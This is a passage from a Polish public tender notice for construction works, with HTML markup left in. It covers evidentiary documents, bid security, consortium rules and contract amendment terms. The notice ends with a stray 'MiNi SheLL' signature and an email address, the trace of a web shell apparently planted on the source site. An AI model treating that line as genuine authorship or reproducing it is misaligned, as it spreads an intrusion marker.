terminie aktualnych na dzień złożenia następujących podmiotowych środków dowodowych:<br/>a) wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres<br/>prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty,<br/>miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, 5-letni okres liczony jest<br/>wstecz od dnia, w którym upływa termin składania ofert (wzór wykazu robot budowlanych stanowi<br/>załącznik nr 8 do SWZ).<br/>Jeżeli Wykonawca powołuje się na doświadczenie w realizacji robót budowlanych, wykonanych<br/>wspólnie z innymi wykonawcami wykaz dotyczy robót budowlanych, w których wykonaniu wykonawca<br/>ten bezpośrednio uczestniczył.<br/>b) Dowodów określających, czy wskazane przez Wykonawcę roboty budowlane, na potwierdzenie<br/>spełnienia warunku udziału w postępowaniu dot. zdolności technicznej lub zawodowej w zakresie<br/>doświadczenia zostały wykonane należycie.<br/>Dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz<br/>którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie<br/>jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty,<br/>c) wykazu osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w<br/>szczególności odpowiedzialnych za kierowanie robotami budowlanymi, wraz z informacjami na temat<br/>ich kwalifikacji zawodowych, posiadanych uprawnień, doświadczenia niezbędnych do wykonania<br/>zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o<br/>podstawie do dysponowania (wzór wykazu osób skierowanych przez wykonawcę do realizacji<br/>zamówienia stanowi załącznik nr 9 do SWZ),<br/>d) informacja banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość<br/>posiadanych środków finansowych lub zdolność kredytową wykonawcy, w okresie nie wcześniejszym<br/>niż 3 miesiące przed jej złożeniem.<br/>Jeżeli z uzasadnionej przyczyny wykonawca nie może złożyć wymaganych przez zamawiającego<br/>podmiotowych środków dowodowych, o których mowa w lit. d, wykonawca składa inne podmiotowe<br/>środki dowodowe, które w wystarczający sposób potwierdzają spełnianie opisanego przez<br/>zamawiającego warunku udziału w postępowaniu lub kryterium selekcji dotyczącego sytuacji<br/>ekonomicznej lub finansowej.<br/>Pełny opis w SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu potwierdzenia braku podstaw do wykluczenia, o których mowa w pkt 5.1. i 5.3 SWZ, Zamawiający przed udzieleniem zamówienia, działając na podstawie art. 274 ust. 1 PZP wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym, nie krótszym niż 5 dni, terminie aktualnych na dzień złożenia następujących podmiotowych środków dowodowych:<br/>a) oświadczenia Wykonawcy, w zakresie art. 108 ust. 1 pkt 5) PZP, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (tekst jedn. Dz. U. z 2021 r. poz. 275), z innym Wykonawcą, który złożył odrębną ofertę<br/>albo oświadczenie o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej (wzór oświadczenia Wykonawcy w zakresie art. 108 ust. 1 pkt 5) PZP o przynależności lub braku przynależności do grupy kapitałowej<br/>stanowi załącznik nr 7 do SWZ),<br/>b) odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4) PZP, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga od wykonawców przedłożenia przedmiotowych środków dowodowych <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> W terminie składania ofert Wykonawca zobowiązany jest złożyć Zamawiającemu Ofertę<br/>zawierającą: a)formularz Oferty (sporządzony wg wzoru stanowiącego zał. nr 1 do SWZ)<br/>sporządzony pod rygorem nieważności, w formie elektronicznej (tj. opatrzonej kwalifikowanym<br/>podpisem elektronicznym) lub w postaci elektronicznej opatrzonej podpisem zaufanym lub<br/>podpisem osobistym,<br/>b) oświadczenia, pod rygorem nieważności, w formie elektronicznej (tj. opatrzonej<br/>kwalifikowanym podpsiem elektronicznym) lub w postaci elektronicznej opatrzonej podpisem<br/>zaufanym lub podpisem osobistym osoby/osób upoważnionych do reprezentacji podmiotu<br/>składającego oświadczenie, złożone przez:<br/>-Wykonawcę - sporządzone zgodnie ze wzorami stanowiącymi odpowiednio załącznik nr 4 i<br/>załącznik 5 do SWZ,<br/>-Wykonawców wspólnie ubiegających się o udzielenie zamówienia - sporządzone zgodnie ze<br/>wzorami stanowiącymi odpowiednio załącznik nr 4 i załącznik 5 do SWZ,<br/>-podmioty trzecie udostępniające Wykonawcy zasoby na zasadzie art. 118 ust. 1 w zw. z art.<br/>266 PZP sporządzone zgodnie ze wzorami stanowiącymi odpowiednio załącznik nr 4a i<br/>załącznik 5a do SWZ;<br/>c) zobowiązanie podmiotu udostępniającego zasoby do oddania Wykonawcy<br/>do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia lub inny podmiotowy<br/>środek dowodowy potwierdzający, że Wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów zgodnie z pkt 7.4.. SWZ, jeżeli Wykonawca wykazując<br/>spełnienie warunków udziału w postępowaniu polega na zdolnościach lub sytuacji innych<br/>podmiotów (niewiążący wzór zobowiązania do oddania Wykonawcy do dyspozycji niezbędnych<br/>zasobów na potrzeby wykonania zamówienia stanowi zał. nr 6 do SWZ),<br/>d) odpis lub informacja z KRS, CEIDG lub innego właściwego rejestru w celu potwierdzenia, że<br/>osoba działająca w imieniu Wykonawcy/podmiotu udostępniającego zasoby jest umocowana do<br/>jego reprezentowania. Wykonawca nie jest zobowiązany do złożenia dokumentów, o których<br/>mowa w zdaniu poprzednim, jeżeli Zamawiający może je uzyskać za pomocą bezpłatnych i<br/>ogólnodostępnych baz danych, o ile Wykonawca/podmiot udostępniający zasoby dostarczy dane<br/>umożliwiające dostęp do tych dokumentów,<br/>e) pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania<br/>Wykonawcy/podmiotu udostępniającego zasoby, jeżeli<br/>w imieniu Wykonawcy/podmiotu udostępniającego zasoby działa osoba, której umocowanie do<br/>jego reprezentowania nie wynika z innych dokumentów złożonych wraz z ofertą (np. odpisu lub<br/>informacji z KRS, CEIDG lub innego właściwego rejestru), sporządzone pod rygorem<br/>nieważności, w postaci elektronicznej i opatrzone się kwalifikowanym podpisem elektronicznym,<br/>podpisem zaufanym lub podpisem osobistym lub w formie opisanej w pkt 7.15 -7.17 SWZ.<br/>f) pełnomocnictwo lub inny dokument potwierdzający umocowanie dla pełnomocnika<br/>ustanowionego przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia do<br/>reprezentowania ich w postępowaniu albo do reprezentowania w postępowaniu i zawarcia<br/>umowy w sprawie zamówienia publicznego, jeżeli ofertę składają Wykonawcy wspólnie<br/>ubiegający się o udzielenie zamówienia, sporządzone pod rygorem nieważności, w postaci<br/>elektronicznej i opatrzonej się kwalifikowanym podpisem elektronicznym, podpisem zaufanym<br/>lub podpisem osobistym lub w formie opisanej w pkt 7.15 – 7.17 SWZ,<br/>g) podmiotowy środek dowodowy w postaci oświadczenia, o którym mowa w art. 117 ust. 4 PZP<br/>(Zamawiający rekomenduje wykorzystać oświadczenie znajdujące się w formularzu ofertowym)<br/>– jeżeli dotyczy,<br/>h) wadium w oryginale w postaci elektronicznej, opatrzonej kwalifikowanym podpisem<br/>elektronicznym osób upoważnionych do jego wystawienia (tylko, gdy Wykonawca wnosi wadium<br/>w formie niepieniężnej). Pełen opis w SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Zamawiający wymaga wniesienia wadium w wysokości określonej poniżej:<br/>1 000 zł (słownie: jeden tysiąc złotych).<br/>Wadium należy wnieść przed upływem terminu składania ofert.<br/>Wadium może być wnoszone w jednej lub kilku następujących formach:<br/>1) pieniądzu,<br/>2) gwarancjach bankowych,<br/>3) gwarancjach ubezpieczeniowych,<br/>4) poręczeniach udzielonych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tekst jedn.:Dz. U. z 2020 r. poz. 299).<br/>Pełen opis w SWZ <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku oferty wykonawców wspólnie ubiegających się o udzielenie zamówienia<br/>(konsorcjum):<br/>1) w formularzu oferty należy wskazać firmy (nazwy) wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia;<br/>2) oferta musi być podpisana w taki sposób, by wiązała prawnie wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia. Osoba podpisująca ofertę musi posiadać umocowanie prawne do reprezentacji. Umocowanie musi wynikać z treści pełnomocnictwa załączonego do oferty – treść pełnomocnictwa powinna dokładnie określać zakres umocowania;<br/>3) oświadczenie, o którym mowa w art. 125 ust. 1 PZP składa każdy z wykonawców wspólnie ubiegających się o zamówienie. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnienie warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu. Ww. oświadczenie wykonawców wspólnie ubiegających się o udzielenie zamówienia powinno zostać złożone wraz z ofertą pod rygorem nieważności, w formie elektronicznej (tj. opatrzonej kwalifikowanym podpisem elektronicznym) lub w postaci<br/>elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.<br/>4) dokumenty, o których mowa w pkt 7.3. obowiązany będzie złożyć każdy<br/>z wykonawców wspólnie ubiegających się o udzielenie zamówienia<br/>5) dokumenty, o których mowa w pkt 7.2. lit. a i c wykonawcy wspólnie ubiegający się o zamówienie składają wspólnie, natomiast dokumenty, o których mowa w pkt 7.2. lit. b i d składa ten z wykonawców wspólnie ubiegających się o udzielenie zamówienia, który wykazuje spełnienie warunku udziału w postępowaniu, do którego wykazania służy dany dokument;<br/>6) wszyscy Wykonawcy wspólnie ubiegający się o udzielenie zamówienia będą ponosić odpowiedzialność solidarną za wykonanie umowy;<br/>7) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia wyznaczą spośród siebie Wykonawcę kierującego (lidera), upoważnionego do zaciągania zobowiązań, otrzymywania poleceń oraz instrukcji dla i w imieniu każdego, jak też dla wszystkich partnerów;<br/>8) Zamawiający może w ramach odpowiedzialności solidarnej żądać wykonania umowy w całości przez lidera lub od wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia łącznie lub każdego z osobna.<br/>9) Zamawiający informuje o treści przepisu art. 117 ust. 3 PZP, zgodnie<br/>z którym w odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają roboty budowlane, do realizacji których te zdolności są wymagane.<br/>W związku z powyższym Wykonawca jest zobowiązany załączyć do oferty podmiotowy środek dowodowy w postaci oświadczenia, z którego wynika, które roboty budowlane wykonają poszczególni Wykonawcy. Wzór stosownego oświadczenia został zawarty w formularzu<br/>ofertowym stanowiącym załącznik nr 1 i Zamawiający zaleca złożyć to oświadczenie właśnie w<br/>tym formularzu.<br/>W przypadku Wykonawców wykonujących działalność w formie spółki cywilnej postanowienia<br/>dot. oferty Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum) stosuje się odpowiednio. Pełen opis w SWZ <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zmiana postanowień zawartej umowy następuje na piśmie pod rygorem nieważności.<br/>2. Zamawiający przewiduje możliwość dokonania następujących zmian Umowy:<br/>1) w zakresie zmiany terminu realizacji Przedmiotu Umowy.<br/>2) w zakresie zmiany sposobu wykonania robót stanowiących Przedmiot Umowy, w tym<br/>wymagań Zamawiającego lub rezygnacji przez Zamawiającego z wykonania części robót<br/>stanowiących Przedmiot Umowy.<br/>3) w zakresie zmiany wynagrodzenia.<br/>4) Dopuszczalna jest zmiana Przedmiotu Umowy, w szczególności zmiana sposobu wykonania<br/>Przedmiotu Umowy, zakresu robót, lokalizacji robót w sytuacji:<br/>a) wystąpienia innych warunków geologicznych, geotechnicznych, hydrologicznych niż<br/>te wskazane przez Zamawiającego w Dokumentacji projektowej, powodujących konieczność<br/>zmiany sposobu wykonania Przedmiotu Umowy;<br/>b) wystąpienia na Terenie budowy niewybuchów, niewypałów, znalezisk archeologicznych lub<br/>innych niezinwentaryzowanych obiektów, które uniemożliwiają lub utrudniają wykonanie robót na<br/>warunkach przewidzianych w Umowie.<br/>5) Dopuszczalna jest zmiana Przedmiotu Umowy poprzez zmianę zakresu robót budowlanych<br/>przewidzianych do wykonania w ramach niniejszej Umowy w przypadku:<br/>a) konieczności wykonania robót zamiennych lub dodatkowych, których wykonanie<br/>ma na celu prawidłowe zrealizowanie Przedmiotu Umowy, a konieczność ich wykonania wynika<br/>z Wad Dokumentacji projektowej;<br/>b) konieczności wykonania robót zamiennych lub dodatkowych niezbędnych<br/>do prawidłowego wykonania Przedmiotu Umowy, które nie zostały przewidziane<br/>w Dokumentacji projektowej przekazanej przez Zamawiającego;<br/>c) zmiany Dokumentacji projektowej wykonane z inicjatywy Zamawiającego ze względu na<br/>stwierdzone wady, co spowoduje konieczność wykonania robót zamiennych lub dodatkowych;<br/>d) zmiany decyzji administracyjnych, na podstawie których prowadzone są roboty budowlane<br/>objęte Umową, powodujące zmianę dotychczasowego zakresu robót przewidzianego w<br/>Dokumentacji projektowej.<br/>3. Dopuszcza się zmianę inspektora nadzoru, zmiana taka nie wymaga zmiany Umowy, a<br/>jedynie powiadomienia Wykonawcy.<br/>4. Zmiana umowy nastąpić może z inicjatywy Zamawiającego albo Wykonawcy poprzez<br/>przedstawienie drugiej Stronie propozycji zmian w formie pisemnej, które powinny zawierać:<br/>a) opis zmiany,<br/>b) uzasadnienie zmiany,<br/>c) koszt zmiany oraz jego wpływ na wysokość wynagrodzenia,<br/>d) czas wykonania zmiany oraz wpływ zmiany na termin zakończenia umowy.<br/>5. Warunkiem wprowadzenia zmian do Umowy będzie potwierdzenie powstałych okoliczności<br/>w formie opisowej i właściwie umotywowanej – protokół wraz z uzasadnieniem zostanie spisany<br/>przez przedstawicieli Zamawiającego i Wykonawcy.<br/>6. Dokonując zmian Umowy, Strony będą kierować się poszanowaniem wzajemnych interesów,<br/>zasadą równości Stron oraz ekwiwalentności świadczeń i przede wszystkim zgodnym zamiarem<br/>wykonania Umowy, poprzez dostosowanie realizacji robót stanowiących Przedmiot Umowy do<br/>zmienionych okoliczności.<br/>7. Wystąpienie którejkolwiek z okoliczności mogących powodować zmianę Umowy, nie stanowi<br/>bezwzględnego zobowiązania Zamawiającego do dokonania zmian ani nie może stanowić<br/>samodzielnej podstawy do jakichkolwiek roszczeń Wykonawcy do ich dokonania.<br/>8. Niezależnie od postanowień ustępów powyższych, Strony dopuszczają możliwość (a) zmian<br/>redakcyjnych Umowy oraz (b) zmian będących następstwem sukcesji uniwersalnej albo<br/>przejęcia z mocy prawa pełni praw i obowiązków dotyczących którejkolwiek ze Stron, (c) zmian<br/>danych Stron ujawnionych w rejestrach publicznych, jak również (d) zmian wynikających<br/>z okoliczności, w których Prawo Budowlane dopuszcza stosowanie rozwiązań zamiennych, o ile<br/>nie będą one pogarszały jakości świadczenia Wykonawcy. Pełen opis w SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-02-15 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Otwarcie ofert następuje poprzez użycie Platformy po uruchomieniu opcji „Otwórz oferty” i dokonywane jest poprzez odszyfrowanie i otwarcie ofert.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-02-15 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-03-16</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Szczegółowy i pełny opis warunków zamówienia został przedstawiony w SWZ, który dostępny jest na stronie prowadzonego postępowania: https://portal.smartpzp.pl/nadl.lesnydwor

Creat By MiNi SheLL
Email: jattceo@gmail.com